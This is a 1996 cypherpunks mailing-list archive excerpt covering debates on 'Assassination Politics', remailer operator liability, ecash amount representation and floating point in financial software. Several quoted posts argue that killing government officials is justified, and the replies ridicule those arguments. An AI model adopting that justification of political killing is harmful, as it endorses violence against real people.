In-Reply-To: <01I50J36B3OG8Y4X9G@mbcl.rutgers.edu>
Message-ID: <199605231919.MAA27630@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>	Nobody, so far as I know, is arguing that one ought to shoot anyone
>in the government... I'd be in danger if that were the case, given that my
>current employer is a state university.

uhm, I hate to bring this up, but the topic of discussion is 
ASSASSINATION POLITICS. those that are in favor of it are in favor
of KILLING POLITICIANS THEY DON'T LIKE. there is absolutely no way
you can flimflam your way around this basic tenet of the philosophy,
no matter how much you or other proponents snivel about "our rights,
violations, justice, due process" etc.  now it is quite possible you
might be advocating killing politicians other than with guns, perhaps
death by covering them with honey and putting them in anthills. but
get a clue about what you are advocating!! killing politicians you
don't like!!

(above statement is equivalent to: well, I SUPPORT AP, but only insofar
as I don't put my own job at risk. if anyone who employs me THINKS
I support AP, please realize you are mistaken)

> If someone is in government and is
>doing something very wrong (although one may disagree on what is wrong, of
>course), then they're a proper target.

"proper target". another lovely euphemism for "target practice for
submachine guns".

>	If the only workable method of self-defense is to kill the person, then
>that's a justifiable means of self-defense.

of course, that is what AP proponents are asserting. THERE IS NO OTHER WAY
they shout. it's our last result. we have no other choice.

 Hopefully, other means of removal
>of those in government who do what is wrong is possible; I do my best to work
>for this. But if it isn't, I'll support AP as an alternative.

hee, hee. what is your criteria? "if the government doesn't repeal 
taxes tomorrow, we're fully justified on going on a shooting spree
at our local government offices". no? oh, perhaps you require a little
more provocation? perhaps a government cleark has to look at you snidely
when you go to review your driver's license? pray tell, what is the
line? please illuminate my ignorance. you see, I have a hard time telling
when someone ought to be put to death. the AP proponents such as yourself
seem so sure of yourself that I'm quite envious. at times TCM and other
cpunks display as much confidence and I must admit I'm quite embarrassed
not to have such security in my own judgements. can one of the experts
here teach me how to pick out the people in a crowd that deserve
execution? surely there must be some simple trick to it all that others
here are not fully sharing.

[hitler]
>>I used him as an example of the kind of thinking that "murdering your
>>enemies solves all your problems". yes, that was his point of view, and
>>you inform me that you share it? well, congratualations!! hitler
>>doesn't have too many friends and can use all the sympathy he can get.
>
>	All your problems? No. But leaving it out as a possible partial
>solution is irrational.

ah, so you do have admitted sympathies for the "kill thine enemies" approach.
yes, perhaps I was too hasty. killing your opponents has many very
obvious and delectable advantages. I'll have to consider it any future
situations I encounter and decide if it would be a useful approach.

>>AP proponents believe that:
>
>>1. the world is full of people that are part of the problem or part
>>of the solution
>
>>2. I can tell precisely the difference
>
>	No, I don't think that I can tell precisely the difference. But it
>appears possible that I'd make less mistakes than the current government does,
>even considering only the cases in which they do kill people (e.g., shootouts
>with drug dealers et al).

so in other words, if you were in charge of the government, it would
be far better off?

>>3. I'd like to kill those that are part of the problem.
>
>	If that's the only way that works, yes.

ah, but you seem to have exhausted all other solutions. could you inform
me when you are going to actually put into play your ideas on assassination
politics? I want to attempt to gauge the results informally. if government
suddenly becomes less oppressive while various bureacrats begin dropping
like flies, I'll know who to thank!!

>>4. if AP existed, and it appeared there was a way to kill other people
>>without trace, I would go through with it.
>
>	Again, if that's the only way that works, yes.

but that is your own and other AP's exact beliefs. "nothing else works.
we're just going to have to start putting politicians to death for their
crimes against humanity". of course you/they don't use this terminology,
but that's the obvious insinuation to anyone with half a brain. unless
you really DO believe the idiotic propaganda terms you guys use like
SELF DEFENSE JUSTICE RIGHTS FAIR TARGET blah blah blah

>>5. I have a lot of teachers I hated in my childhood too. I think I
>>will go for them next. possibly not before seeing if they beg for mercy.
>
>	I invite you to look at the psychological defense mechanism known as
>projection, preferably along with a trained psychiatrist or clinical
>psychologist in inpatient therapy.

I invite you to consider the meaning of the exhortation, "thou shalt not
kill", and the consequences of defying it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Fri, 24 May 1996 10:05:43 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <adca03eb020210043329@[205.199.118.202]>
Message-ID: <199605231937.MAA25268@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Paraphrasing the "Wired" item, "No person who has ever received "The
> Briefing" has ever again argued forcefully for the rights of citizens to
> use strong cryptography."

	It's my understanding that this statement is now false. I
believe that Matt Blaze recently received "The Briefing" and he is
still on our side.
	(I personally think it was a mistake on their part to give him
said Briefing, as they should have realized he couldn't be
converted. Now that someone has "withstood the Briefing" it gives them
less credibility.)


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Fri, 24 May 1996 07:50:41 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: [AP] [NOISE] Re: PROPOSAL
In-Reply-To: <199605211950.MAA11596@mail.pacifier.com>
Message-ID: <v03006f00adca53b7fdc2@[206.151.234.118]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713579.multipart/signed"

--Boundary..3941.1071713579.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Uni (for whom I have great esteem and no little curiosity about why he lets
Bell send him off into the weeds) said:
>[Yadda Yadda Yadda]
>
>Motion: To create the alt.politics.assassination.politics newsgroup and
>the "AP" mailing list so as to clear the meaningless traffic (for which I
>am significantly responsible) out of this forum.
>
>Any seconds?


Seconded enthusiastically. All in favor, see you in alt.config.

-Paul

--
Paul Robichaux                    LJL Enterprises, Inc.
paul@ljl.com                      Be a cryptography user. Ask me how.



--Boundary..3941.1071713579.multipart/signed
Content-Type: application/octet-stream; name="pgp00004.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00004.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQU1hU2oxeHcxMVhkMzBmU3RBUUhOdlFQK09XdzREVWtpeEZBV3VF
TmlOamhvMWtLdDhTcDJaQnE0CjFPUGJVY2RrZjRaVllqK2dIMU9lWDlPekYz
Q0lSSmZtWDRxajNxZGhXb2FadkkvWDloUkhZTzhrUlpUMDlJNkgKdXYzaXdT
RklXTUFQRzNGaTZIbmtkSkNhZTZySUhOS0xmem1EYkZVRlkxSVNOdWlvOUs1
c2UzemZqVFRkTzlvdApiQktjMUkrUDhkbz0KPXh3clkKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3941.1071713579.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 24 May 1996 08:05:02 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: The Twilight of the Remailers?
In-Reply-To: <199605222008.NAA02211@netcom16.netcom.com>
Message-ID: <9605231751.AA00362@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos <mpd@netcom.com> wrote:
>   Andrew Loewenstern <lowensa@il.us.swissbank.com> wrote:
>   > While this is a nice thought, it is incorrect.  You can't
>   > "covertly inject packets into the Net, in some untraceable
>   > manner."
>
>  You can temporarily modify router tables, spoof IPs and idents,
>  and leave few traces behind once the data has been transferred,
>  particularly if the origin is some obscure foreign location.

Sure, doing this will make your packets untraceable, but for how long?   
Changing router tables and spoofing IPs is going to attract unwanted  
attention fast.  I don't think such active IP attacks are appropriate for a  
remailer running unattended.

Perhaps you mean that individual users should do these kinds of things  
instead of using remailers?  For untraceability, I would put my money on  
chained MixMasters over IP spoofing.  Besides, with IPv6 you won't be able to  
do these things anymore, but remailers will still work.

>  The idea here was to have a large number of nodes, each capable
>  of injecting data into the Net in a manner which cannot be
>  easily traced back to an individual.  These nodes would talk
>  to each other using a mechanism which obscured both eavesdropping
>  and traffic analysis of their communications, a DC-Net being
>  one possible way of doing this.

It's a good idea but it doesn't work in the real life.  You can't put a  
message in a public place (like UseNet) or send one to an unwitting e-mail  
recipient (such as a mailing list) in an untraceable manner, repeatedly over  
time.  The last remailer is going to traceable.  A DC-Net is great, but it  
isn't going to be useful to very many people if the only people you can send  
messages to are the other DC-Net participants.  Yes, this has applications,  
but it is not a replacement for the remailers we have now and are starting to  
loose at an alarming rate.

>   > Since it looks like the "everyone's a remailer" dream is
>   > not becoming a reality, the key to successful remailers is
>   > to make the *operators* untraceable as well.  If you can't
>   > trace the operator, you can't hold them liable.  We have
>   > discussed techniques for doing this before: cash paid
>   > accounts, using dialups (possibly from a public phone).
>   > The remailer must be a 'sacrificial cow' that can be > snatched
>   > up by 'authorities' at any time.

>  You could get the same effect with an instant anonymous account
>  that could be purchased with Ecash.  You would buy it on the
>  spot, send your mail, and forget about it.  For all practical
>  purposes, it would serve the same function as a remailer, and
>  steps could be taken to obscure the identity of whoever had
>  telnetted to it.

But not every piece of mail sent through a remailer is 'hot' enough to get  
it shut down.  The vast majority of traffic is harmless.   Also, taking steps  
to obscure the identity of whoever had telnetted to it is hard, way too hard  
for the average user who wants to send remail securely.  If the remailer op  
does it once to setup a remailer, then potentially a very large number of  
people can use the remailer until it gets busted.  In the mean time the  
remailer op collects postage to compensate him for his effort.

Also you later say that "I don't think most people are going to pay to  
remail."  Well if people aren't going to pay to remail, why would they pay to  
open a disposable ecash account to send a piece of untraceable mail?  How  
much will the cheapest account be?  Probably less than what a remailer, which  
can handle hundreds of messages a day, running on the exact same account  
would charge.

Then you say "Or, to put it another way, the types of traffic people will  
pay to remail are those no remailer operator will want to touch with a barge
pole."  Well duh.  My message you are refuting (and suggesting that the  
alternative is IP spoofing) is entirely centered around the idea that the  
remailer operator remain untraceable is because the traffic could potentially  
be too 'hot' for the remail-op to manage.  I guess you mean that the all the  
harmless traffic will disappear once you have to pay to play.  Well, if the  
only remailers around are for-pay ones with untraceable operators because all  
the public ones got busted, people will pay.  If people didn't want a high  
assurance of untraceability, people would just use Penet.

I don't think remail postage is going to have to be expensive.  It doesn't  
take long to pay for a $15 a month telnet-only account.  If you charged only  
a dime each, it would only take 150 messages to pay for it.  Over a month  
thats about 5 messages a day.  Sounds reasonable to me.  A 3 remailer chain  
would cost $0.30, less than snail mail...

>  Another possible approach is the "remailing packets" one.
>  You could set up a packet remailer which could be used as a
>  universal proxy server in some untouchable foreign location.
>  If we had a "packet remailer in a box", these things could
>  pop up all over the place, live a short time, and be nuked.
>  Since the communication would be real-time, concerns over
>  reliability and delivery would not exist in the same way they
>  do for the current system of remailers.

Which untouchable foreign locations do you refer to?  For all the talk of  
these glorious havens we don't have any remailers setup in them.  The  
Netherlands isn't one of them.  Neither is Germany or France for sure.  You  
can't have these "pop up all over the place" if it has to pop up in an  
untouchable foreign location that doesn't exist.  If you think people get the  
heebie jeebies about running a remailer that could possibly be used to carry  
threats or illegal pictures, just wait to you see their reaction when you  
tell them that people could use their packet remailer to hack other sites.   
While remailer traffic has a chance of getting constitutional protection (in  
this country obviously), there is no doubt that hacking machines is not  
protected.

Buying an anonymous telnet-only account with cash, then using a CyberCafe or  
some other public Net terminal to setup the remailer sounds like a much more  
viable solution for a potential remail-op than flying to Micronesia.  Or  
waiting patiently for people in these untouchable foreign locations to setup  
remailers.

Also, I think it's time to stop expecting people to rush out and setup these  
things if they were easier to setup.  People simply don't get enough benefit  
for the risk of running a remailer.  A web server is harder to setup than  
Mixmaster but there are a lot more web sites.  If remailer ops are going to  
be liable for content, then few people are going to want to do it, regardless  
of the difficulties involved of setting up the software.

Also, people want an/pseud-onymity.  Look at how many accounts the penet  
service has.  As people realize that such services offer little assurance of  
untraceability, they will turn more and more to cypherpunk remailers.  If the  
only way a remailer can stay up is if it charges then the market will decide  
if it is worth it.  I think the market is there.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 24 May 1996 09:47:16 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <199605231913.MAA03950@mail.pacifier.com>
Message-ID: <199605231952.MAA00769@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>What?!?  You mean that after 100 million war deaths in this century alone, 
>you're suggesting that we DON'T have "free-for-all bloody violence"?  Or are 
>you simply used to the kind of violence that exists today?  That's a common 
>trap people fall into:  They simply accept whatever current system we have, 
>as if it is somehow required or okay or...

ah yes, more "two wrongs make a right". "dammit, the government gets
to kill people all the TIME, why can't we share the same JOY in doing
so? the world would be a far better place. Assassination Politics--
it's only *fair*!!"

>
>Right!  There are no "laws" per se.  But there are people, and their 
>interests, and what they believe to be their rights.

as I was saying, I believe one of my rights is that anyone who disagrees
with me about the horror and depravity of AP should be snuffed out 
immediately.

>RIGHT!  But as importantly, they aren't the _victims_ of that "judicial 
>system" either.  Rodney King, for instance.  Donald Scott.  Randy Weaver.  
>The Branch Davidians, etc.  All these people were fundamentally victims of 
>an organization political/legal heirarchy filled with people who had 
>(defacto) greater rights/authority than ordinary citizens, and abused the 
>public with it.
>

ah, so two wrongs make a right. if a court anywhere at any time in the
US, in centuries of perhaps hundreds of thousands of decisions, makes
a decision YOU PERSONALLY DISAGREE WITH, then you are fully justified
in going out and shooting some people (or government bureacrats, that
is, who cannot really be considered human)

>I've explained that I believe that the post-AP world will be far less 
>violent than today,

hee, hee. that's like Hitler explaining why the enemies of the state
must be expurgated for any meaningful advancement in the glorious 1000 year 
reich. read "mein kampf". surely you can borrow a lot of his ideas.
obviously you already have many of them.

 partly because there will be no people in positions of 
>authority who can abuse the rest of us with impunity, or force us to go to 
>war against our will. 

ah yes. kill everyone who moves. then you will finally have peace. what
about simply resisting a government that supposedly "forces" you to
do something? well, I have to admit that just shooting government 
bureacrats is probably much more fun. I guess that is the definition of
resistance for you. it's so @#$%^^&* tedious and
time consuming to do anything else.

 It will also allow GOOD people to punish BAD people 
>without depending on the "system" to do it.

hee, hee. that's funny, because you have alway struck me as
a BAD person. and I KNOW that I am a GOOD person.

  It will also tend to prevent 
>the enforcement of "victimless crime" laws that currently result in 60-70% 
>of the prison and jail population.

uh huh. it probably leaves your dishes virtually spotless too. gosh, 
can you tell me where I can buy this wonderful stuff?

> You need to show that yes, you see the advantages, but also show that you 
>have a plausible belief that my system will be worse than the status quo.  
>Citing a specific potential problem without quantifying it is pointless.

yes, clearly I have utterly failed to demonstrate why shooting
random government bureacrats would not improve our reality but in
fact make it worse. I'll have to work on my case some more. I fully
concede to your superior debate skills that have left me choking on
dust.

>>but who decides what is wrong?
>
>Each individual, for himself.  True, he may occasionally make mistakes, but 
>I contend that the vast majority of these decisions will be entirely 
>justified.  The truly bad people, the REAL criminals, will not last long.

you've got something there. it's an easy way of looking at it all. if
a lot of people are dying like flies around me because of AP,  I only
need conclude they were the real criminals. what a relief!! it would
be quite horrible if innocent people died. that's the part I like
most about your plan. only criminals are killed. the innocent would
be left alone. now that you explain it in those terms I find it far
more appealing and perhaps even workable.

>If the danger you describe was of higher probability than the alternative, 
>the status quo, you might have a point.  But it isn't.  Further, the 
>prospect of AP getting rid of (or reforming, because they'll have no choice) 
>most of the real criminals (plus de-populating government and preventing its 
>abusiveness) results in a dramatic reduction in the violations of rights 
>that will occur.

actually, your ideas sound so outstanding and progressive
that I wish you would run for office. in fact if you don't I'm
going to put your name on the next write-in ballot. we'll get you
in a place where your ideas can have some application if it kills
somebody. hehehehhee

>Just because we currently think of "the government" as "the entity created 
>to safeguard rights" doesn't mean that this is really so, and it doesn't 
>mean that it actually achieves a net protection of our rights.  What 
>government actually does is to monopolize (as best it can) the use of force, 
>and then force the public to pay for a protection service.  And monopolies 
>result in classicly bad service, as we all know.

right. so the solution to this thing is to just kill everybody that is
participating in its perpetuation. of course you shouldn't use words
like "kill" outright. use words like "self defense" ad nauseam. such
is the true art of the propagandist. congratulations on your mastery!!

>If the probability of an improper action is dramatically reduced, without 
>being eliminated, that is an improvement, right?  Tell me, as a citizen 
>don't we deserve changing to a system that reduces violations of rights?

yeah. and I like the idea of shooting people as the only means to do so.
I guess that once I learn to read between your lines, and find what you
are really advocating, I feel much better.

>>it will "work" exactly as anonymous murdering now works. AP already exists, 
>>that's what you don't understand.
>
>No, it doesn't, certainly not quantitatively, and in practice not 
>qualitatively, either.  

yeah, assassinations of political leaders are kinda rare. like kennedy.
and then there's the bungling like with Reagan. really, we need a better
system. we need to increase the percentage. it doesn't work right now
because the efficacy is way lacking. I'm glad someone with brains such
as yourself is working on this problem. again, perhaps you should talk
to TCM who also believes that a more mafia-like reality would be the
salvation of humanity.

>Take a 5-foot wave, and notice that it doesn't overflow a 50-foot seawall.  
>Twenty of them, separately, likewise don't get past it.  But combine them in 
>one large wave, and the 100-foot wave does get by.  The fundamental 
>advantage of AP is that the desires of thousands of people can be combined 
>in order to accomplish what no individual would be able to induce on his own.

beautiful. I always love your analogies in which you talk about waves
instead of killing and murdering politicians. its so much more poetic.
your opponents are the ones that use all the crass words. well, screw 'em.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 24 May 1996 09:16:38 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <2.2.32.19960523200615.0072a288@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

At 12:11 PM 5/23/96 -0800, jim bell wrote:

>Tell ya what: name a weapon that CANNOT be used to harm an 
>innocent person.  Go ahead, I'm waiting.

The Truth?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Fri, 24 May 1996 09:39:24 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
Message-ID: <v02140b01adca741015f0@[17.128.203.188]>
MIME-Version: 1.0
Content-Type: text/plain


A 64-bit floating point number (i.e., C double) should be suitable for
financial software under the following conditions:

-- Money must be represented in integral units (cents, not dollars and
cents).

-- The maximum value to be computed must be less than about 10^17. This
   includes intermediate values.

-- Addition, subtraction, and multiplication by an integer are the
   only operators.

Under the above conditions, there should be no loss of precision.

However, when division is required (as in currency conversion
or interest rate computation), one must be careful to control
round-off error. For example, a mortage payment schedule might
be computed using true (non-exact) floating-point arithmetic, with
the last or first payment adjusted to cover any residual error.
(You might want to re-read Donn Parker's book on computer crime,
paying special attention to the "salami" method of embezzelment
by accumulating round-off errors in a private account.)

Note that not all financial computation needs to be done with "to
the penny" accuracy: even our own dearly beloved IRS allows
(indeed, encourages) us to compute our tax declaration using
a whole-dollar round-off method.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 24 May 1996 07:12:55 +0800
To: <cypherpunks@toad.com
Subject: Re: ecash representation
Message-ID: <199605231725.KAA18985@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> In my last article, I slightly screwed up.
> 
> A signed 32 bit fixed point number, with two places of precision (less
> than you need when calculating things like interest and what have you,
> but lets be generous) has a maximum representation of even less than I
> off the cuffed -- a mere 21,474,836.48. This is hardly sufficient for
> accounting. However, floating point is even less useful.
> 
> .pm

Back in the mid-80's, I worked for several years at Irving Trust, 
a (now-gone) major money center bank. One of the financial 
messaging systems I worked with stored currency amounts
as 96-bit vectors of a base unit (eg, a penny), and 
could have a 'binary point' anywhere in the vector. There were
the usual math functions available to handle this data type.

If you split the vector evenly between fractional and
non-fractional parts, you could represent amounts up to
$7E13 to an accuracy of  about 3E-15 of a cent. The maximal
amount that could be represented was about $2E28, and the
highest precision about $1E-29 of a cent.

This range and level of precision was judged adequate of most 
purposes :-).


Peter Trei
ptrei@acm.org

"Did you know that there is a subunit of the Japanese yen?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Fri, 24 May 1996 07:29:40 +0800
To: dccp@eff.org (dccp mailing list)
Subject: Re: draft NIST key escrow paper
In-Reply-To: <199605212038.NAA08809@netcom3.netcom.com>
Message-ID: <v03006601adca5263b1f3@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:38  -0400 5/21/96, Pat Farrell wrote:
>http://www.isse.gmu.edu/~pfarrell/nist/kmi.html

after sentence 1 of their introduction, people might want to re-read
http://www.clark.net/pub/cme/html/civ-own-crypto.html

"Government can no longer monopolize state of the art cryptography."  It's
about time they admitted that governments historically had no monopoly on
state-of-the-art cryptography.

>
>Enjoy
>Pat
>
>Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
>Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
>PGP key available via finger or request           #include standard.disclaimer

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Fri, 24 May 1996 07:51:09 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <199605231304.GAA13631@toad.com>
Message-ID: <Pine.SUN.3.91.960523133203.18689B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


Probably the best system is one that is in the middle.... that is say a 
message comes into a remailer targetting a user whom the remailer hasn't 
seen before, the remailer needs to make a decision as to whether to 
discard the message or deliver it.

While the idea to either ROT13 the message or PGP it or somesuch sounds 
like a good one, it doesn't prevent spam-your-enemy's-mailbox attacks.  
Imagine 10,000,000 messages sent through remailers to your mailbhox, each 
ROT13'ed with a notice at the top stating "Wana read this? Un ROT13 it!" 
Very bad.  However, what this is trying to do is quite honorable.

Here's what I propose:


Finger the target user and see if there's a universal token in his finger
info (.plan file) that say looks like "::*ACCEPT ANONYMOUS EMAIL*::" or
"::*REJECT ANONYMOUS EMAIL*::" or some such...  If we can get all
remailers to do this and respect finger info then there is no issue. 

One flaw in this is that some systems (my isp, dorsai, included) shut off 
the finger daemon for security reasons.  In this case, the remailer 
should store the anonymous message on its hard drive for upto a week and 
send a notice message to the target asking them if they want to receive 
the email or not, and how to deal with future anonymous requests  The 
remailer then has to keep a table of those recipients for whom finger fails.

This is also an issue for shitty ISP's such as AOL or CI$ whom will not 
allow finger info because they don't run a cool unix service. :^)

While this is going to eat up a bit of space on the remailer, space could 
be limited for the user, etc.  If the space on the server runs out, what 
do you do?  The remailer should still inform the target, but again a 
policy question rises - does the remailer send the message anyway, does 
it delete the message but inform the target that "Sorry dude, you had an 
anonymous email, but I had no room to store it and so I delted it.  IF 
you don't want it delted the next time around, activate finger tags 
thusly, or send a reply to this message with "Accept Anonymous Email" or 
"Reject Anonymous Email" as the subject and I'll respect your wishes from 
now on"???

If a target's finger info does not fail but fails to produce a remailer 
accet/reject tag, there's a question of policy: does the remailer go 
ahead and send the message and adds a heading to the message informing 
the user how to set accept/reject in their finger info, or does it act as 
if the user's finger server is disabled?

Another thought is that we could set up some universal remailer allow 
fingering service where the remailers can use some server somewhere or a 
list of servers somewhere to look up a user's email address and see if 
they are willing to receive anonymous email.  Sort of like PGP key servers.

Or we could have a DNS like service of email addresses between all 
remailers which should propagate their tables to each other of the 
exceptions and whether or not they wish to receive anonymous email...

This setup also allows a potential anonymous person to see whether or not 
their target accepts anonymous messages before they bother writing a long 
rant to them about what a nice person they are, and what to shove where. :)

This also solves the question or rather wishes of the mailing list or 
usenet group owners who may not wish to accept anonymous posts, such as 
alt.uptight.assholes.at.some.org but allows them to be posted on 
something like alt.whistleblowers, alt.sex-victims or whatever. :)

Is this enough food for thought?

==========================================================================
 + ^ + |  Ray Arachelian |FH|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UE|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CC|What part of 'Congress shall make no |=\/|\/=
  /|\  |    Just Say     |KD|law abridging the freedom of speech' |==\|/==
 + v + | "No" to the NSA!|TA|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
Obscenity laws are the crutches of inarticulate motherfuckers-Fuck the CDA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 24 May 1996 08:09:14 +0800
To: Bovine Remailer <haystack@cow.net>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <9605231819.AA20115@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 23 May 96 at 13:16, Bovine Remailer wrote:

> jf_avon@citenet.net wrote:

> >Take note: If you want me to read you, cc me since I unsubscriVed
> >:) from Cypherpunks...
> >
> 
> there _IS_ a God...
> woof

Of course!  But it just unsubscriVed from CP.

Talk about cowardice... not even posting in your own name a remark of
that style...  

You should consider switching to the fuckin.chicken.com remailer.


Sigh... 

So many things to do, so little time...

JFA 
While the Brave dies only once, the Coward dies a thousand times. (old
arab proverb)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMaRycMiycyXFit0NAQFPlQf/R/ynMySw2SkoWZKjCsdl5CqpuF4VwaTq
P/1+o+/kDnf+M66NJ/dznmm8VDj3mNtU0uhU9nIBWegsWel7UKQf9e3WAp9tRs5q
9pmkCvoLVJmSGHrMeXbLrcd+fynKOsgEV2ma4SIrrmVoafwtbkcK7DrYh/PuVSUd
ItMCbN8BzD332hQ1ETEHn0tG+hBFheLDFo5oaCqL1Zg4pd2CYRW8x2xKy4DoyEkH
7Fl1MhG0WaIu2MAB68IEKO5rCS8Y2V9L2zkCxNYqCMucK6ZwzL7vlXd7wVFEG+gI
OTpiZvhWLv7Tl/j3Fgk7rgunzJcNEY9YMDjqd2ufMKYNk/3BveST1g==
=molC
-----END PGP SIGNATURE-----

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 24 May 1996 03:40:26 +0800
To: cypherpunks@toad.com
Subject: CLI_pr3
Message-ID: <199605231418.OAA02731@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-23-96. WaJo: 
 
   "Chasing Criminals at Cyberspeed." 
 
      Three recent developments in the money laundering trade 
      have governments especially worried: the proliferation 
      of offshore financial centers, the collapse of the 
      Soviet Union and the adaptation of emerging technologies 
      to criminal ends. Officials think newly developed "smart 
      cards" will be particularly appealing to criminals. 
      Smart cards could be used to download cash from bank 
      accounts, then used to make payments or deposits 
      anywhere in the world. All without anyone knowing who 
      holds the smart card, because encryption guarantees 
      anonymity. 
 
      Says Stanley Morris, director of FinCEN, "The only way 
      we can adequately assist our federal law enforcement 
      counterparts in following the trail of the multinational 
      money launderer is through our linkages with 
      multilateral arrangements such as ... [Clipper 3]." 
 
 
   5-23-96. FiTi: 
 
   "Japanese recruit 2,000 spies to monitor Asia crises." 
 
      Their main source of official information will be 
      material gathered by six electronic listening posts 
      stationed across Japan. 
 
 
   CLI_pr3 (for 2) 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Fri, 24 May 1996 00:57:18 +0800
To: perry@piermont.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960523122903.003b857c@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 15:04 1996-05-22 -0400, Perry E. Metzger wrote:
>However, accounting systems DO NOT use 32 bit fixed point arithmetic.
>
>One client of mine had around $10Billion under management. Do you
>think they were doing their accounting on a system that could only
>deal with fixed point numbers of 45Million or so? Hell, individual
>trades are larger.

Sure, but we were really discussing Ecash(tm), not accounting. To quote
from the FAPI:

/* An EC_Amount is a signed 32-bit integer.  It represents an amount 
 * of money in units of the coinage's base value.  
 */

>Accounting systems require exact math -- down to the cent.

Come on, we're not talking cents here. Question is, how do you represent
a one ITL coin in Ecash(tm) with a USD mint? We are way below the cent
level, where no accountant has ever gone before...


Regards,

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 May 1996 08:47:01 +0800
To: trei@process.com
Subject: Re: ecash representation
In-Reply-To: <199605231726.NAA17935@linet02.li.net>
Message-ID: <199605231858.OAA26827@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Back in the mid-80's, I worked for several years at Irving Trust, 
> a (now-gone) major money center bank. One of the financial 
> messaging systems I worked with stored currency amounts
